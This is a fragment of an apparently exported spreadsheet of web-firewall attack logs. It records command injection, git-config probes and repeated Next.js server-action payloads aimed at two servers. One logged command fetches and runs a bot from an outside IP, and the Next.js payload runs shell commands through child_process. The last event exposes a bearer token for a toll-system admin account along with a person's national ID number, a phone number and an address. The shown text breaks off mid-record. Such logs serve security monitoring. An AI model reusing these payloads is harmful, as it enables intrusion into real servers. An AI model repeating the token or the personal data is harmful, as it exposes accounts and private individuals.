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70" windowHeight="1280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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="243" uniqueCount="124">
  <si>
    <t>id</t>
  </si>
  <si>
    <t>attack_type</t>
  </si>
  <si>
    <t>risk_level</t>
  </si>
  <si>
    <t>risk_level_num</t>
  </si>
  <si>
    <t>action</t>
  </si>
  <si>
    <t>protocol</t>
  </si>
  <si>
    <t>country</t>
  </si>
  <si>
    <t>website</t>
  </si>
  <si>
    <t>event_id</t>
  </si>
  <si>
    <t>timestamp</t>
  </si>
  <si>
    <t>province</t>
  </si>
  <si>
    <t>src_ip</t>
  </si>
  <si>
    <t>dest_port</t>
  </si>
  <si>
    <t>host</t>
  </si>
  <si>
    <t>url_path</t>
  </si>
  <si>
    <t>rule_id</t>
  </si>
  <si>
    <t>detector</t>
  </si>
  <si>
    <t>proxy_name</t>
  </si>
  <si>
    <t>src_port</t>
  </si>
  <si>
    <t>dest_ip</t>
  </si>
  <si>
    <t>req_header_raw</t>
  </si>
  <si>
    <t>req_body</t>
  </si>
  <si>
    <t>resp_header_raw</t>
  </si>
  <si>
    <t>resp_body</t>
  </si>
  <si>
    <t>payload</t>
  </si>
  <si>
    <t>location</t>
  </si>
  <si>
    <t>decode_path</t>
  </si>
  <si>
    <t>命令注入</t>
  </si>
  <si>
    <t>高危</t>
  </si>
  <si>
    <t>拦截</t>
  </si>
  <si>
    <t>https</t>
  </si>
  <si>
    <t/>
  </si>
  <si>
    <t>https://221.213.115.47/AdminPage/conf/runCmd</t>
  </si>
  <si>
    <t>4136d1e9f39c4c358b81d7497cf842a9</t>
  </si>
  <si>
    <t>1767711418</t>
  </si>
  <si>
    <t>46.19.137.194</t>
  </si>
  <si>
    <t>221.213.115.47</t>
  </si>
  <si>
    <t>/AdminPage/conf/runCmd</t>
  </si>
  <si>
    <t>m_cmd_injection</t>
  </si>
  <si>
    <t>chaitin-safeline</t>
  </si>
  <si>
    <t>192.168.30.34</t>
  </si>
  <si>
    <t>GET /AdminPage/conf/runCmd?cmd=cd%20/tmp;wget%20http://46.151.182.222/bot;chmod%20777%20bot;./bot%20nginx; HTTP/1.1\r\nHost: 221.213.115.47:443\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0\r\nCookie: SOLONID=ab4603d571394000a48398f2383fdc26; Hm_lvt_8acef669ea66f479854ecd328d1f348f=1705042515; Hm_lpvt_8acef669ea66f479854ecd328d1f348f=1705042611\r\nReferer: https://221.213.115.47:443/\r\n\r\n</t>
  </si>
  <si>
    <t>cd /tmp;wget http://46.151.182.222/bot;chmod 777 bot;./bot nginx;</t>
  </si>
  <si>
    <t>urlpath</t>
  </si>
  <si>
    <t>信息泄露</t>
  </si>
  <si>
    <t>https://221.213.115.48/.git/config</t>
  </si>
  <si>
    <t>c4912fb39fc34a6a9aee05c5c4336f9d</t>
  </si>
  <si>
    <t>1767711304</t>
  </si>
  <si>
    <t>185.241.208.170</t>
  </si>
  <si>
    <t>221.213.115.48</t>
  </si>
  <si>
    <t>/.git/config</t>
  </si>
  <si>
    <t>m_rule/d3d9446802a44259755d38e6d163e820</t>
  </si>
  <si>
    <t>GET /.git/config HTTP/1.1\r\nHost: 221.213.115.48\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36\r\nAccept-Charset: utf-8\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n</t>
  </si>
  <si>
    <t>XSS</t>
  </si>
  <si>
    <t>泰国</t>
  </si>
  <si>
    <t>https://221.213.115.47/</t>
  </si>
  <si>
    <t>42bd0fc050bf4190a033133f7a456b9d</t>
  </si>
  <si>
    <t>1767704697</t>
  </si>
  <si>
    <t>101.108.51.244</t>
  </si>
  <si>
    <t>/</t>
  </si>
  <si>
    <t>m_xss</t>
  </si>
  <si>
    <t>POST / HTTP/1.1\r\nHost: 221.213.115.47\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0\r\nContent-Length: 702\r\nAccept: text/x-component\r\nAccept-Encoding: gzip, deflate, br\r\nAccept-Language: en-GB,en;q=0.9\r\nCache-Control: no-cache\r\nConnection: keep-alive\r\nContent-Type: multipart/form-data; boundary=---------------------------94529715024454\r\nNext-Action: x\r\nUpgrade-Insecure-Requests: 1\r\n\r\n</t>
  </si>
  <si>
    <t>-----------------------------94529715024454\r\nContent-Disposition: form-data; name=\"0\"\r\n\r\n{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\",\"_response\":{\"_prefix\":\"var res=process.mainModule.require(\'child_process\').execSync(\'pwd\').toString().trim();;throw Object.assign(new Error(\'NEXT_REDIRECT\'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\",\"_chunks\":\"$Q2\",\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\r\n-----------------------------94529715024454\r\nContent-Disposition: form-data; name=\"1\"\r\n\r\n\"$@0\"\r\n-----------------------------94529715024454\r\nContent-Disposition: form-data; name=\"2\"\r\n\r\n[]\r\n-----------------------------94529715024454--</t>
  </si>
  <si>
    <t>var res=process.mainModule.require(\'child_process\').execSync(\'pwd\').toString().trim();;throw Object.assign(new Error(\'NEXT_REDIRECT\'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});</t>
  </si>
  <si>
    <t>body</t>
  </si>
  <si>
    <t>json</t>
  </si>
  <si>
    <t>中危</t>
  </si>
  <si>
    <t>放行</t>
  </si>
  <si>
    <t>https://221.213.115.47/.git/credentials</t>
  </si>
  <si>
    <t>5c85e93c539e430a82f5aaef953cc1db</t>
  </si>
  <si>
    <t>1767698444</t>
  </si>
  <si>
    <t>195.178.110.162</t>
  </si>
  <si>
    <t>/.git/credentials</t>
  </si>
  <si>
    <t>m_rule/45c48cce2e2d7fbdea1afc51c7c6ad26</t>
  </si>
  <si>
    <t>GET /.git/credentials HTTP/1.1\r\nHost: 221.213.115.47\r\nUser-Agent: Mozilla/5.0 (Linux; Android 8.0.0; moto e5 plus Build/OPPS27.91-122-3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.126 Mobile Safari/537.36\r\nAccept-Charset: utf-8\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n</t>
  </si>
  <si>
    <t>HTTP/1.1 404 Not Found\r\nServer: Tengine\r\nDate: Tue, 06 Jan 2026 11:20:44 GMT\r\nContent-Type: text/html; charset=utf-8\r\nContent-Length: 666\r\nConnection: keep-alive\r\nETag: \"60e42b81-29a\"\r\n\r\n</t>
  </si>
  <si>
    <t>&lt;html&gt;\r\n\t&lt;head&gt;\r\n        &lt;meta charset=\"UTF-8\"&gt;\r\n\t\t&lt;style&gt;\r\n\t\t\tbody {\r\n\t\t\t\tmargin: 0;\r\n\t\t\t\tpadding: 0;\r\n\t\t\t\twidth: 100%;\r\n\t\t\t\theight: 100%;\r\n\t\t\t\tcolor: #B0BEC5;\r\n\t\t\t\tdisplay: table;\r\n\t\t\t\tfont-weight: 100;\r\n\t\t\t}\r\n\r\n\t\t\t.container {\r\n\t\t\t\ttext-align: center;\r\n\t\t\t\tdisplay: table-cell;\r\n\t\t\t\tvertical-align: middle;\r\n\t\t\t}\r\n\r\n\t\t\t.content {\r\n\t\t\t\ttext-align: center;\r\n\t\t\t\tdisplay: inline-block;\r\n\t\t\t}\r\n\r\n\t\t\t.title {\r\n\t\t\t\tfont-size: 42px;\r\n\t\t\t\tmargin-bottom: 40px;\r\n\t\t\t}\r\n\t\t&lt;/style&gt;\r\n\t&lt;/head&gt;\r\n\t&lt;body&gt;\r\n\t\t&lt;div class=\"container\"&gt;\r\n\t\t\t&lt;div class=\"content\"&gt;\r\n\t\t\t\t&lt;div class=\"title\"&gt;404 \xe5\xbe\x88\xe6\x8a\xb1\xe6\xad\x89\xef\xbc\x8c\xe6\x82\xa8\xe6\x9f\xa5\xe7\x9c\x8b\xe7\x9a\x84\xe9\xa1\xb5\xe9\x9d\xa2\xe6\x89\xbe\xe4\xb8\x8d\xe5\x88\xb0\xe4\xba\x86\xef\xbc\x81&lt;/div&gt;\r\n\t\t\t&lt;/div&gt;\r\n\t\t&lt;/div&gt;\r\n\t&lt;/body&gt;\r\n&lt;/html&gt;\r\n</t>
  </si>
  <si>
    <t>https://221.213.115.48/</t>
  </si>
  <si>
    <t>ba67111ccdde4852b182372aba02463f</t>
  </si>
  <si>
    <t>1767687760</t>
  </si>
  <si>
    <t>103.124.109.94</t>
  </si>
  <si>
    <t>POST / HTTP/1.1\r\nHost: 221.213.115.48\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15\r\nContent-Length: 690\r\nAccept: text/x-component\r\nAccept-Encoding: gzip, deflate, br\r\nAccept-Language: ja-JP,ja;q=0.9,en;q=0.8\r\nCache-Control: no-cache\r\nConnection: keep-alive\r\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary13d7478fafeff54b\r\nNext-Action: x\r\n\r\n</t>
  </si>
  <si>
    <t>------WebKitFormBoundary13d7478fafeff54b\r\nContent-Disposition: form-data; name=\"0\"\r\n\r\n{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\",\"_response\":{\"_prefix\":\"var res=process.mainModule.require(\'child_process\').execSync(\'pwd\').toString().trim();;throw Object.assign(new Error(\'NEXT_REDIRECT\'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\",\"_chunks\":\"$Q2\",\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\r\n------WebKitFormBoundary13d7478fafeff54b\r\nContent-Disposition: form-data; name=\"1\"\r\n\r\n\"$@0\"\r\n------WebKitFormBoundary13d7478fafeff54b\r\nContent-Disposition: form-data; name=\"2\"\r\n\r\n[]\r\n------WebKitFormBoundary13d7478fafeff54b--</t>
  </si>
  <si>
    <t>美国</t>
  </si>
  <si>
    <t>2f51bc6de186485a8cf9915eb312af2a</t>
  </si>
  <si>
    <t>1767680780</t>
  </si>
  <si>
    <t>134.209.186.72</t>
  </si>
  <si>
    <t>GET /.git/config HTTP/1.1\r\nHost: 221.213.115.48\r\nUser-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);\r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n</t>
  </si>
  <si>
    <t>ed6ca0a965c9417d9cdddab7d96d1639</t>
  </si>
  <si>
    <t>1767671909</t>
  </si>
  <si>
    <t>34.194.151.175</t>
  </si>
  <si>
    <t>POST / HTTP/1.1\r\nHost: 221.213.115.48\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0\r\nContent-Length: 690\r\nAccept: text/x-component\r\nAccept-Encoding: gzip, deflate, br\r\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\r\nCache-Control: no-cache\r\nConnection: keep-alive\r\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary4fc43c9db48dd156\r\nNext-Action: x\r\n\r\n</t>
  </si>
  <si>
    <t>------WebKitFormBoundary4fc43c9db48dd156\r\nContent-Disposition: form-data; name=\"0\"\r\n\r\n{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\",\"_response\":{\"_prefix\":\"var res=process.mainModule.require(\'child_process\').execSync(\'pwd\').toString().trim();;throw Object.assign(new Error(\'NEXT_REDIRECT\'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\",\"_chunks\":\"$Q2\",\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\r\n------WebKitFormBoundary4fc43c9db48dd156\r\nContent-Disposition: form-data; name=\"1\"\r\n\r\n\"$@0\"\r\n------WebKitFormBoundary4fc43c9db48dd156\r\nContent-Disposition: form-data; name=\"2\"\r\n\r\n[]\r\n------WebKitFormBoundary4fc43c9db48dd156--</t>
  </si>
  <si>
    <t>印尼</t>
  </si>
  <si>
    <t>090cb93287f449e58ddaff1f37b7dc0f</t>
  </si>
  <si>
    <t>1767669690</t>
  </si>
  <si>
    <t>203.161.30.164</t>
  </si>
  <si>
    <t>POST / HTTP/1.1\r\nHost: 221.213.115.48\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15\r\nContent-Length: 666\r\nAccept: text/x-component\r\nAccept-Encoding: gzip, deflate, br\r\nAccept-Language: en-US,en;q=0.9\r\nCache-Control: no-cache\r\nConnection: keep-alive\r\nContent-Type: multipart/form-data; boundary=----FormBoundaryd969fbda58afe51d\r\nDnt: 1\r\nNext-Action: x\r\nUpgrade-Insecure-Requests: 1\r\n\r\n</t>
  </si>
  <si>
    <t>------FormBoundaryd969fbda58afe51d\r\nContent-Disposition: form-data; name=\"0\"\r\n\r\n{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\",\"_response\":{\"_prefix\":\"var res=process.mainModule.require(\'child_process\').execSync(\'pwd\').toString().trim();;throw Object.assign(new Error(\'NEXT_REDIRECT\'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\",\"_chunks\":\"$Q2\",\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\r\n------FormBoundaryd969fbda58afe51d\r\nContent-Disposition: form-data; name=\"1\"\r\n\r\n\"$@0\"\r\n------FormBoundaryd969fbda58afe51d\r\nContent-Disposition: form-data; name=\"2\"\r\n\r\n[]\r\n------FormBoundaryd969fbda58afe51d--</t>
  </si>
  <si>
    <t>中国</t>
  </si>
  <si>
    <t>https://www.yns-etc.com/ynyt/prod/v2/etc/inspect/getVehicleExtOrCardObuUserDetail</t>
  </si>
  <si>
    <t>e2c3ee10a2a64c80af1fe341cd5784cd</t>
  </si>
  <si>
    <t>1767663616</t>
  </si>
  <si>
    <t>云南</t>
  </si>
  <si>
    <t>14.204.41.169</t>
  </si>
  <si>
    <t>www.yns-etc.com</t>
  </si>
  <si>
    <t>/ynyt/prod/v2/etc/inspect/getVehicleExtOrCardObuUserDetail</t>
  </si>
  <si>
    <t>m_response</t>
  </si>
  <si>
    <t>GET /ynyt/prod/v2/etc/inspect/getVehicleExtOrCardObuUserDetail?applyId=927766462226001920 HTTP/1.1\r\nHost: www.yns-etc.com\r\nConnection: keep-alive\r\nCache-Control: max-age=0\r\nAuthorization: bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxMjU4MDU4ODQyODE0NTQ1OTIsInVzZXJfbmFtZSI6ImNvbXBhbnl1c2VyXzEyIiwic2NvcGUiOlsicmVhZCJdLCJleHAiOjE3Njc3MDM4NTgsImF1dGhvcml0aWVzIjpbImNhbmNlbCIsInJlbGVhc2VWZWhpY2xlIiwiZm9yY2VVbnJlZ2lzdGVyIiwiYXNzaWduX2JyYW5jaCIsImN1cnJlbmN5SGFuZyIsInNwZWNpYWxTaXR1YXRpb24iLCJhZGp1c3RtZW50UmV2aWV3IiwibWFuYWdlbWVudGF1ZGl0IiwiQWNjb3VudFJlY292ZXIiLCJOU3RvcmVkRnVuZCIsInNlZXRlbCIsInN1cGVyYWRtaW4iLCJWZWhpY2xlV2hpdGVMaXN0IiwiZXRjVHJhbnNNYW5hZ2VyIiwiY29uc3VtZXNlbmRFbWFpbCIsImRpcmVjdF9yZWZ1bmQiLCJvcmRlcl9hc3NpZ25lciIsImNvbXBhbnlvcGVyYXRvciIsInN0b3JlX21hbmFnZXIiLCJ3ZWJSZWNoYXJnZVJBIiwiVG9BY2NvdW50TWFuYWdlciIsIkF1ZGl0bW9kaWZ5IiwiaW5zdGl0dXRpb251c2VyIiwiVmVoaWNsZUZyZWVBZG1pbiIsImN1cnJlbmN5Q2FuY2VsIiwiTlN0b3JlZE9wZXJhdG9yIiwidG9vbCIsIkF1ZGl0Iiwic2FsZXNtYW4iLCJkaXJlY3RSZWZ1bmQiLCJsd2dzVHJhbnNmZXIiLCJ1c2VyIl0sImp0aSI6IjhiNGI4ODZjLTk5NDQtNDdmNS1hYmE1LTQ0MThlZDIyMTcwNCIsImNsaWVudF9pZCI6InlueXRfd2ViX21nciJ9.hhiF9X1PTa9NRpoL7alIEn2Mt786eMgQyzGCo_ILRCvdRy6N84Cp0nujh0E1qVkdg43n7XxITq2lgWzbuj8mbrMIID5gW8ctE7Dcc1X58V_JKXvf_3tlXTw7sIZ1errJmrveAAwyPvQtPlsPPnI204WrRKzN6gxNvY842WM_DcNhABpNi5Lg_cM14ci92nzXpodXujgSMZFaNA__U68Cobm0NhuRS64V0LYjcX7Qset-r3htbtJAy_CrjC2NCgcsBADEVntTVdD6xd6nbwRlfOCGAFlK4_qeRVLmDInU2foLL1IQvkUIg_TRoRuWWO7HpI0clNDtqbAQhIqbbM6sow\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36\r\ncontent-type: application/json\r\nAccept: */*\r\nSec-Fetch-Site: same-origin\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Dest: empty\r\nReferer: https://www.yns-etc.com/ynytV2/IssuerActiveAudit\r\nAccept-Encoding: gzip, deflate, br\r\nAccept-Language: zh-CN,zh;q=0.9\r\n\r\n</t>
  </si>
  <si>
    <t>HTTP/1.1 200 OK\r\nServer: Tengine\r\nDate: Tue, 06 Jan 2026 01:40:16 GMT\r\nContent-Type: application/json\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Request-ID: 9f396b66e273836f\r\nX-Frame-Options: SAMEORIGIN\r\nX-Content-Type-Options: nosniff\r\nX-XSS-Protection: 1; mode=block\r\n\r\n</t>
  </si>
  <si>
    <t>{\"code\":\"000000\",\"message\":\"\xe5\xa4\x84\xe7\x90\x86\xe6\x88\x90\xe5\x8a\x9f\",\"timestamp\":\"2026-01-06T09:40:16.723Z\",\"data\":{\"etcUserInfo\":{\"id\":\"530101150911342592\",\"accountId\":\"b530b54d2ef2437185942772a30481a4\",\"userType\":2,\"userName\":\"\xe9\x80\x9a\xe6\xb5\xb7\xe5\x85\xb4\xe9\x91\xab\xe8\xbf\x90\xe8\xbe\x93\xe6\x9c\x89\xe9\x99\x90\xe5\x85\xac\xe5\x8f\xb8\",\"userIdType\":202,\"userIdNum\":\"56621124-5\",\"tel\":\"13908893686\",\"address\":\"\xe9\x80\x9a\xe6\xb5\xb7\xe5\x8e\xbf\xe7\xa7\x80\xe5\xb1\xb1\xe9\x95\x87\xe7\xa7\x80\xe5\xb1\xb1\xe4\xb8\x9c\xe8\xb7\xaf20\xe5\x8f\xb7\",\"registeredType\":2,\"channelId\":\"5301019999901030004\",\"registeredTime\":\"2015-09-11T07:10:07.000+00:00\",\"department\":\"\xe6\x9c\xac\xe9\x83\xa8\",\"agentName\":\"\xe5\xbc\xa0\xe4\xbc\xa6\xe7\xba\xa2\",\"agentIdType\":101,\"agentIdNum\":\"532424196812021639\",\"bank\":\"\",\"bankAddr\":\"\",\"bankAccount\":\"\",\"taxpayerCode\":\"\",\"status\":1,\"statusChangeTime\":\"2017-12-26T06:06:29.000+00:00\",\"faceFeatureVersion\":\"\",\"faceFeatureCode\":\"\",\"createBy\":1,\"createTime\":\"2019-12-31T15:59:59.000+00:00\",\"updateBy\":1,\"updateTime\":\"2019-12-31T15:59:59.000+00:00\"},\"etcCardInfo\":{\"id\":\"1612221002037983\",\"cardNetid\":\"5301\",\"cardType\":211,\"agencyId\":\"53010199999\",\"etcUserId\":\"530101150911342592\",\"vehicleId\":\"FFNX26463816895528944\",\"plateNum\":\"\xe4\xba\x91F69933\",\"plateColor\":1,\"enableTime\":\"2017-04-11T16:00:00.000+00:00\",\"expireTime\":\"2027-04-11T16:00:00.000+00:00\",\"issuedType\":2,\"issuedChannelId\":\"5301010200234210003\",\"issuedAgencyId\":\"53010102002\",\"issuedTime\":\"2017-04-12T02:06:30.000+00:00\",\"issuedMode\":2,\"signedChannel\":\"002\",\"status\":1,\"statusChangeTime\":\"2019-12-20T03:55:09.000+00:00\",\"createBy\":1,\"createTime\":\"2019-12-31T15:59:59.000+00:00\",\"updateBy\":1,\"updateTime\":\"2019-12-31T15:59:59.000+00:00\",\"accountId\":null,\"oldUserId\":\"530101150911342592\",\"secondUserId\":null,\"cardVersion\":null},\"etcObuInfo\":{\"id\":\"530119900C263214\",\"etcUserId\":\"530101150911342592\",\"vehicleId\":\"FFNX26463816895528944\",\"plateNum\":\"\xe4\xba\x91F69933\",\"plateColor\":1,\"enableTime\":\"2019-12-31T16:00:00.000+00:00\",\"expireTime\":\"2029-12-31T16:00:00.000+00:00\",\"registeredType\":2,\"registeredChannelId\":\"5301010200201008888\",\"registeredAgencyId\":\"53010102002\",\"registeredTime\":\"2019-12-31T16:00:00.000+00:00\",\"registeredMode\":2,\"signedChannel\":\"002\",\"installType\":2,\"status\":1,\"statusChangeTime\":\"2020-08-07T01:25:31.000+00:00\",\"createBy\":1,\"createTime\":\"2019-12-31T15:59:59.000+00:00\",\"updateBy\":845639143991427072,\"updateTime\":\"2026-01-04T03:38:35.000+00:00\",\"accountId\":null,\"oldUserId\":\"530101150911342592\",\"obuVersion\":null},\"etcVehicleInfoExt\":{\"createMode\":2,\"updateUser\":\"0\",\"updateTime\":1577807999000,\"plateNumber\":\"\xe4\xba\x91F69933\",\"signId\":\"0\",\"plateColor\":1,\"signChannel\":\"002\",\"accountId\":\"b530b54d2ef2437185942772a30481a4\",\"cardId\":\"1612221002037983\",\"obuId\":\"530119900C263214\",\"expectAccountId\":\"530101150911342592\",\"vehicleId\":\"FFNX26463816895528944\",\"cardStatus\":1,\"obuStatus\":1,\"vehicleStatus\":0},\"businessSeq\":[{\"signStatus\":2,\"uploadStatus\":255,\"remark\":\"{\\\"issueUpdate\\\":{\\\"message\\\":\\\"\xe8\xae\xa2\xe5\x8d\x95\xe5\xae\x8c\xe6\x88\x90\\\",\\\"times\\\":4,\\\"updateTime\\\":\\\"2026-01-04 11:41:38\\\"}}\",\"type\":10,\"plateColor\":1,\"applyId\":\"927766462226001920\",\"createUserHall\":\"006\",\"businessCompleteTime\":1767498099000,\"vehicleId\":\"FFNX26463816895528944\",\"createUserOrg\":\"5301010200601008888\",\"createMode\":2,\"accountType\":211,\"updateUser\":\"User166168028864581632\",\"updateTime\":1767498099000,\"plateNumber\":\"\xe4\xba\x91F69933\",\"signChannel\":\"002\",\"accountId\":\"b530b54d2ef2437185942772a30481a4\",\"backStatus\":0,\"createTime\":1767497586000,\"auditUploadStatus\":0,\"cardId\":\"1612221002037983\",\"obuId\":\"530119900C263214\",\"nationalUploadStatus\":1,\"createUser\":\"166168028864581632\",\"monitorUploadStatus\":0,\"status\":1},{\"openId\":\"35b218c86a2046599b1fdeccef3b2a62\",\"signStatus\":1,\"uploadStatus\":255,\"monitorUploadTime\":1596852233000,\"type\":9,\"signId\":\"0\",\"nationalUploadFailReason\":\"\",\"plateColor\":1,\"applyId\":\"211656130953228288\",\"vehicleId\":\"FFNX26463816895528944\",\"createMode\":2,\"accountType\":211,\"updateUser\":\"User177987654489477120\",\"updateTime\":1596763745000,\"plateNumber\":\"\xe4\xba\x91F69933\",\"signChannel\":\"002\",\"accountId\":\"b530b54d2ef2437185942772a30481a4\",\"monitorUploadFailReason\":\"\xe8\xbd\xa6\xe8\xbe\x86\xe4\xbf\xa1\xe6\x81\xaf\xe4\xb8\x8a\xe4\xbc\xa0\xe5\xa4\xb1\xe8\xb4\xa5\xef\xbc\x9a\xe4\xb8\x8a\xe4\xbc\xa0\xe5\xa4\xb1\xe8\xb4\xa5\\n\xe5\x8d\xa1\xe4\xbf\xa1\xe6\x81\xaf\xe4\xb8\x8a\xe4\xbc\xa0\xe6\x88\x90\xe5\x8a\x9f\\n\xe7\xad\xbe\xe4\xbf\xa1\xe6\x81\xaf\xe4\xb8\x8a\xe4\xbc\xa0\xe5\xa4\xb1\xe8\xb4\xa5\xef\xbc\x9a\xe4\xb8\x8a\xe4\xbc\xa0\xe5\xa4\xb1\xe8\xb4\xa5\\n\",\"backStatus\":0,\"createTime\":1596763708000,\"auditUploadStatus\":0,\"cardId\":\"1612221002037983\",\"obuId\":\"530119900C263214\",\"nationalUploadStatus\":1,\"createUser\":\"177987654489477120\",\"nationalUploadTime\":1596763715000,\"monitorUploadStatus\":2,\"status\":1},{\"openId\":\"35b218c86a2046599b1fdeccef3b2a62\",\"signStatus\":1,\"uploadStatus\":255,\"remark\":\"{\\\"issueUpdate\\\":{\\\"times\\\":2,\\\"updateTime\\\":\\\"2020-08-07 09:26:07\\\",\\\"message\\\":\\\"\xe8\xae\xa2\xe5\x8d\x95\xe5\xae\x8c\xe6\x88\x90\\\"}}\",\"monitorUploadTime\":1596763579000,\"type\":6,\"signId\":\"211655725888319488\",\"nationalUploadFailReason\":\"\",\"plateColor\":1,\"applyId\":\"211655725888319488\",\"vehicleId\":\"FFNX26463816895528944\",\"createMode\":4,\"accountType\":211,\"updateUser\":\"User177987654489477120\",\"updateTime\":1596763681000,\"plateNumber\":\"\xe4\xba\x91F69933\",\"signChannel\":\"002\",\"accountId\":\"b530b54d2ef2437185942772a30481a4\",\"monitorUploadFailReason\":\"\\n### Error querying database.  Cause: java.sql.SQLSyntaxErrorException: Unknown column \'create_by\' in \'field list\'\\n### The error may exist in com/inesanet/ynytcloud/monitor/data/mapper/TblObuBaseInfoMapper.java (best guess)\\n### The error may involve com.inesanet.ynytcloud.monitor.data.mapper.TblObuBaseInfoMapper.selectByPrimaryKey-Inline\\n### The error occurred while setting parameters\\n### SQL: SELECT contract_id,issuerId,obu_id,brand,model,insert_time,batch_id,status,create_by,create_time,update_by,update_time,last_location  FROM tbl_obu_base_info  WHERE  contract_id = ?\\n### Cause: java.sql.SQLSyntaxErrorException: Unknown column \'create_by\' in \'field list\'\\n; bad SQL grammar []; nested exception is java.sql.SQLSyntaxErrorException: Unknown column \'create_by\' in \'field list\'\",\"backStatus\":0,\"createTime\":1596763475000,\"auditUploadStatus\":0,\"cardId\":\"1612221002037983\",\"obuId\":\"530119900C263214\",\"nationalUploadStatus\":1,\"createUser\":\"177987654489477120\",\"nationalUploadTime\":1596763568000,\"monitorUploadStatus\":4,\"status\":1},{\"signStatus\":1,\"uploadStatus\":255,\"monitorUploadTime\":1612754295000,\"type\":1,\"nationalUploadFailReason\":\"\",\"plateColor\":1,\"applyId\":\"168746522685480960\",\"signRemark\":\"\xe5\x8e\x86\xe5\x8f\xb2\xe6\x95\xb0\xe6\x8d\xae\xe8\xa1\xa5\xe5\x85\xa5\",\"vehicleId\":\"FFNX26463816895528944\",\"createMode\":99,\"updateUser\":\"0\",\"updateTime\":1586674952000,\"plateNumber\":\"\xe4\xba\x91F69933\",\"accountId\":\"X530101150911342592\",\"monitorUploadFailReason\":\"\xe5\xae\xa2\xe6\x88\xb7\xe4\xbf\xa1\xe6\x81\xaf\xe4\xb8\x8a\xe4\xbc\xa0\xe6\x88\x90\xe5\x8a\x9f;\\n\xe8\xbd\xa6\xe8\xbe\x86\xe4\xbf\xa1\xe6\x81\xaf\xe4\xb8\x8a\xe4\xbc\xa0\xe5\xa4\xb1\xe8\xb4\xa5\xef\xbc\x9a\xe4\xb8\x8a\xe4\xbc\xa0\xe5\xa4\xb1\xe8\xb4\xa5;\\n\xe5\x8d\xa1\xe4\xbf\xa1\xe6\x81\xaf\xe4\xb8\x8a\xe4\xbc\xa0\xe6\x88\x90\xe5\x8a\x9f;\\n\xe7\xad\xbe\xe4\xbf\xa1\xe6\x81\xaf\xe4\xb8\x8a\xe4\xbc\xa0\xe6\x88\x90\xe5\x8a\x9f;\\n\",\"backStatus\":0,\"createTime\":1586533106000,\"auditUploadStatus\":0,\"cardId\":\"1612221002037983\",\"obuId\":\"530119900C263214\",\"nationalUploadStatus\":1,\"createUser\":\"\",\"nationalUploadTime\":1587883936000,\"monitorUploadStatus\":2,\"status\":1}],\"etcVehicleInfo\":{\"id\":\"FFNX26463816895528944\",\"plateNum\":\"\xe4\xba\x91F69933\",\"plateColor\":1,\"userType\":\"1B\",\"type\":13,\"etcUserId\":\"530101150911342592\",\"ownerName\":\"\xe9\x80\x9a\xe6\xb5\xb7\xe5\x85\xb4\xe9\x91\xab\xe8\xbf\x90\xe8\xbe\x93\xe6\x9c\x89\xe9\x99\x90\xe5\x85\xac\xe5\x8f\xb8\",\"ownerIdType\":202,\"ownerIdNum\":\"56621124-5\",\"ownerTel\":\"13908893686\",\"ownerAddress\":\"\xe4\xba\x91\xe5\x8d\x97\xe7\x9c\x81\xe7\x8e\x89\xe6\xba\xaa\xe5\xb8\x82\xe9\x80\x9a\xe6\xb5\xb7\xe5\x8e\xbf\xe7\xa7\x80\xe5\xb1\xb1\xe9\x95\x87\xe7\xa7\x80\xe5\xb1\xb1\xe4\xb8\x9c\xe8\xb7\xaf20\xe5\x8f\xb7\",\"contactName\":\"\xe9\x80\x9a\xe6\xb5\xb7\xe5\x85\xb4\xe9\x91\xab\xe8\xbf\x90\xe8\xbe\x93\xe6\x9c\x89\xe9\x99\x90\xe5\x85\xac\xe5\x8f\xb8\",\"registeredType\":2,\"channelId\":\"5301019999901120008\",\"registeredTime\":\"1999-12-31T16:00:00.000+00:00\",